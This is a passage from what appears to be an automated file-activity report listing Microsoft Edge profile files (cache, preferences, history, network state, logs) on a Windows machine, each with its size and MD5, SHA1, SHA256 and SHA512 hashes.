                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              ad897cce1b48c83b9472c5f71fb03b308cf6082b8d42a6ef4dbdeb7df6a3d801153d5154c004b776dd3d59abe1c8df40cf666ceafbb72bb59b74bcc442104652

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              520KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              3984094cc81f436705429ed63ebbfa3b

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              59d9989298a826912387ccc6e6ce3f4d7e8d9a9f

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              46a8361584e71613d8a6a3f3e850458a09ce8fef4a35917fceb77d51ad80397b

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              e184dfceeba8b91181f1157b21237a0d7841b5a0de594d1017e9a62d114d819501770dbe0a520401689bdf60e7023822000d84744a6f3d5328daee27241ae79f

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_2

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1.0MB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              67c31d3cd30537e69a765495ee0374ae

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              b4ab8e0c8632c8ee70d7feedc342e98c79017e6c

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              879525d0246352d78965eb76a9904cae571648f65973e9c62601bc2c46fdc426

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              30f386d835a14f19fd9e84b90f76b7cff74adf5f6311ccf1166afa399dc7f4e20708519a1aa44d957184af4ebcab6dcb5ee760324969ac2e105c80a2dba02481

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              8.0MB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              e9122de20589855e9b8f3dd1f03fb6b2

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              309046468630758be927857fa4f7f1f05f8d265b

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              c98798142aef34e3e7b3d0cb863a598cc20660bbeb3d8771f0c32529ccfb7cee

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              0145adb36d96b96cf734d6d71900c14def03a5925eede53c854899500a91f3dba342aadc741228f8d611fdf2c3759a83a176eeaa7c6d2aed5617f7f49a8c8724

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              5KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              f62195fefaa65c5acfcf944cf3b76108

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              6baed5a04e3419c9be4582b74a4480590e4a3ad6

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              d048490e60db3268bd04d75c3c4f8434fea474150fc1e987ae4f6cfd140143ab

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              46e89e42f8c918354e652499d3acc542f1a53bfdda3b6622845b40ad4f7cc07b1a2ee1363b2bac4453a01f69802fd3b37b448c09780b244515a5f400b8aa5bda

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              6961f0238adf896f44335ec3b85154cc

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              cca4fae83a557d557a5d88b1867608ac0662547e

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              622edd9eca35effa8f8e859401b1e14762038eb704fe8b5647366973fccd55c1

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              95def2b8dc34b4ce6343b30df594eba0fec989b0434b7d873dfd026869fa8d37a70cad76750360704d8eaf94fde00d2378939e0fcf29227fdc806e21c86bbb23

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57d4d4.TMP

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              a6ded319994831632738522e40f22561

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              1d28a0c4dc71fbea02d87f8678504dccd25aea99

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              6354905e6cf9a5559aa69ec9d939d38f071bc3ae7d25ba3d0ef5c374682eb4d8

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              636120a3ad1b53e64477e7dedf163a2b58636b8174520f2bbd79d4bd1547cd4ee9cc3d97075aaafa9ec7858f3bb574e1caca463fe383862a6805633292c57b46

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              99914b932bd37a50b983c5e7c90ae93b

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              20KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              d0eaa172f3bbf72652359b70b4ebf9f4

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              b00788054f525e931158ac78f0ada17d6789d8f6

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              5fae474698a5c75799e4f9f6e4a7fab926372d177904dbc4e4c4af4f036fc807

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              259b06dde9049b471b5e6b068fdd581e1b5fa757fec4a600fb5c7c933abed4f95dd0c5b941fd0dac7a30414c968297036c7eac1e92dec840ac07a701034f3624

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              264KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              b016a2a37b83156a43dc509712c9468a

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              a6ac6b50452acedffa2cb70936d4b6c19a1425a5

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              b3ef033b660d0a1a9344193497e8920d4a831d46ecfe73344bb8bea07ef94e64

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              121467315ac8d3b9dbf3495105fd69cb9b1c9c5b08e8d50c5fb6311afbee9d15b1b51cbb1b9329c0a211e5c088e942f70e990c08ccc0adb28eab9585e3c06fb8

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              224KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              3cf3cbfee9d8cff26a4c0eca5bcf3be9

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              90df1446ade1d5f937d04cce1ccc6e92392bd650

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              1f0281dca0fbbcc2466d26d6601e2e8d098bfb3a476aea61fd957a8a12630859

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              7654b0392ecc0ee7b2d3fa24d802b3a34139947ed6c746561cb0803ac9b6df9e6fecb2c0d18a0d5d3549921fe197663fb358537dea57fdf504b656622d675760

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              108KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              06d55006c2dec078a94558b85ae01aef

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              6a9b33e794b38153f67d433b30ac2a7cf66761e6

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              9KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              daa96fdb1342d7a49a350ca72f29e629

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              f80628757e488eb00d3f550bca265d8c0b205d54

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              b20f0ee910e6da19fc2dd893076715cb514bc4e0ab58a808df6141053cda96e7

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              164081123e8a085b7ac008b3aa1b79b411a4cf8f3554e27c9ac4ac7b2e82272d6e27d5fd80477d292ef92f75c5512724a4fd55fb6d93daec3b4530721cfc691b

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              14KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              1cc0e3d523ed52009ec29842686d4e6e

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              b79ae6892a271bc3ca6eea6ec5f5fbb223b49e46

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              c3162f63e3975c7fc7a50ad1cd2e1de1771304b661b5134030ed30ede8396fb9

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              489cf0df9600abe52e72aefeadc7cb321ec9b76a609772d270a08a9bba05a6850e2733ce275a085d56861c90bb41c186c3ab40cbad09b8c0c48c83b53eade214

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              9KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              3cafc2964fcc514fb3e921fa2428e927

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              3d9fa5cc36e2bf3cfefeb84a359040628ac05d32

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              b202fbf52d09ec5178b4c4a410fe9cc0728a3e7886a5c8c825ede2bd7e30955a

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              f13f3b167e7359182e31143aa23198dc25f3899aa71758a98571934de11d0bacdb1388f93932f7fd1895dee414079386c588e9c172d3b454b7af940954c6b591

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              40B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              20d4b8fa017a12a108c87f540836e250

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              19KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              15456c0e9e99303b886b7054147b9792

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              0e3c4976dc35cf03952cb71dad2754c18b023a9b

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              61ca7583103c9963ecac22b8c5be4e431b4a03ca0a83fb1984d1bb8d2439b7ee

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              0e8de26cdea35dd5981b0519b514d0d07ba9c1888ebc2a07286fb721896ec62700598e6036ea8a5245e07422019190c4dd247e6705c7671da926784907f76e99

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              24KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              6b3ef4d4af10624d7d79ee2a64144b36

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              62e7cdb46baf99780d90d49f01b4986ce55ee2d9

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              b596e1bee1b9df4dcedbd40e613689f60d4e8019b66a1cb985823c1e534875d2

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              330ed7bbc09adf7db2d321fcbb2cabf02781e05881d2623868320f9490f9ff82377db869df4e718485858b62ec05c016b08d03b2015b266bba67dfc5819eec62

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              19KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              70cf388bfb224f13bbda5aa2259b9555

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              5143b80847e134dd3e156e77d1965b34c33a3bf8

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              460ef5b61a16c8f79dc75a139a7094a4e23de2be9c939c5a23581a806eb24db3

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              f034eaf35761bfd620ef94144cc489d2232a1d996262efc04790dabe5bc3a3ca0e1962c8051255b2c8b782811ee605954d20748b90be2544bba1e8650f4ff20b

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              36KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              c068467b0f8a192d0bc21534cc1cd5a2

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              62d2ef721469d357ba7fb4d76f7de636add6605c

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              03caa628b0052260a068cf5cf88e478ecf44cd2cec978a740f179545e939a145

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              e5febfa10ef2cbccae310691e1aca3bd95fd804aa2230cad32598d8aa51921072678734ef2bb54509e67727d1856dd77c918b1c179c8c775228d6faddff70f1e

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              338B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              780011c229d086a700f108aece7f2ecc

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              f169eaace2e4ded113b886995474f172beba54b0

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              735bb2271114bc0faab70fdb7f2645236e2d341c1d978ce59d99b9f740668da4

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              9631eecaf17bd59dc212864a406a86d825c5e887c5595303d067e3aff13471ac60b3d48b1c74b0e74ff8d38f1cdb624437b3c385b46a9e32fe88a05917e84886

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              347B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              1464f3d0dc3d4ccf0dd69d764502f0f7

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              089e24b41888bb17c293c3423b796234f69c5b90

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              f4aa2bd531ea193b23fa841dff1f4de9038e58b4eec5d66bf28b2ee9cc31a17c

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              1168493b8c8b7fafc4439e93926aeb1bb445df6e88b7ce01b1b8594c8e6908fe826b00dc7cb04ae247919dcdb02faa15718a2527775e11a117e283970ead9dca

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              326B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              ed236d6575f8011412f6351562b1b8b0

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              38c27e928ac95be7145c4dcdc2677bf9cdf7fc00

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              8079efb1a004df3ac4a9a669075a157f384039046d55f3ba940da47f440ebed2

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              65ad571e3401702ea7859192e250a8183978790e79cba83885e93a37a126c107b3fd23ba96e97bda9721fff1319347bd9fb9e9fabe3b3967b9ab3a414e9729d1

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              22KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              ed9025915b4d450eb78e3f8a4194c10a

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              270f3b7b7d6e86f28124b10665f3761ce48076c1

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              f096f01bfe6438965d0a9677ca8c000f4cd736ef8a9c74c5425f6808307b1332

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              4e4d61df1eb338799057461dd9fd256ee1ca84678629457d96f5dcabd7337acc4dcc9f93ca2085f41b5a41021c092c253d547af9e75420ed0df4ee9378a1115f

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              128KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              2fa8f38fc092da1f08851e0f43f21655

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              b28f702cc5c141be03c5b90b5d9a19ec32ca669f

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              522358b7bcfc84b165a51bffb00395fbcee4dffb7d91fd838273d4b2b1985e2b

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              1aa08e61467d1b6630b42274c4144aa4bae7a7c65403f868b7f1bdeddae7822807f43d06ff62ace56a3870222519d279823bf9aa3cf9a39cf017fad735d94104

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              465B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              703f50ff899cd3158fb1eb485426316f

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              8ca19e27c521882065e4effbea01260a60ed216f

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              21d77f1e260c43b896432db56a6a01672c722d1f2c9df657261d3bef0f91f5fb

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              b085ea0866bdc1d602c3c8fcbb8c2a1db072c636e8ebc29e2b0c8490691cb46500b03518e55edf98ad569cf6638ddfa88ecc4fc9b684ac25340fd51c330448ca

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              898B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              c26d9900111e591c07216585169bc512

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              6b648672a7b3aaf67f321d6b76971f02914f4bdb

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              f575a05e567822525657b1f403334c1f678e243444583885a867a268c5135c6d

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              36227a84068cf1a8c85a0e75e625a8aa8c804d5424ced7dc23cc15117b746d871ffc618f749f0df317fee8592f4f75ed6899f49987e23ee77fa5652cfb2bd518

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              23KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              c1119eb3263ea787ebd59d8932d3a59d

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              3fc9124fe21145152a35c08f47893d5e2c540032

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              49e076ec450b8f8f0fa26691457d218df6d1b4fff9220a5023cc91076ae2d7f1

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              11641d505b15446ae6670dfd8bbad8eb7edbd0bcdc342243c058bf0f4e872a84e4f74afec16be50874c3c1b9d36a2505f341196dea5b46c796f1b66b210428ea

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              22KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              3f8927c365639daa9b2c270898e3cf9d

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              c8da31c97c56671c910d28010f754319f1d90fa6

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              fc80d48a732def35ab6168d8fd957a6f13f3c912d7f9baf960c17249e4a9a1f2

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              d75b93f30989428883cb5e76f6125b09f565414cf45d59053527db48c6cf2ac7f54ed9e8f6a713c855cd5d89531145592ef27048cf1c0f63d7434cfb669dbd72

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              13B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              3e45022839c8def44fd96e24f29a9f4b

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              c798352b5a0860f8edfd5c1589cf6e5842c5c226

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              01a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              2888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              54KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              3d77be4e6fb0f8a3c56d9c92f75238f5

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              e90d47a05d3fe08d2d470f9a9eca074a9e3d3e05

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              870a8545b4b771c55b292d0f1211ac5854c8271c7d40c6346d97acc0b06ebc32

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              f15204efb70fdfcfaf329c79640e5764710c13369c29152ee3c37ae7e9a6aa0e4b870b52939b3f7b484398caffd00a0712cceaa8125974f3e1da23d62cc04cf6

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              60KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              cf78923b1061eb5c2425ab720d52f025

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              f1d2b9e827c4aeed8e74926ab7f2f8e773c4ce20

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              55329a3f6fa53319f94ae1beda9da4cd32ecace3f132065e90b8713dd0a27480

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              04728ffb7576a1e3caf252323a137c62bac1f346cea5dcc2819554ec5b7b37a9599f5c69e2e99ad48d86e32c95f7bce0964fe6f5753d5f7645585c48e819c9d1

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              54KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              8afaaea552ecbc45e03f751611272c18

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              8b038e38ee52b080fbc0424c7afe720a6044be77

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              71924716e2eb2afb5946370bb9e2941051a338765ac99b8e7dbb54afcb92f822

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              83f328e1e874c2b40155e68873dc6b0096ae335fd2c69d5c71fe177e85aec3e509c4af16460c1741b31b2d6dd02b239e909380bb30a4d1411e55accc22190509

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              48KB

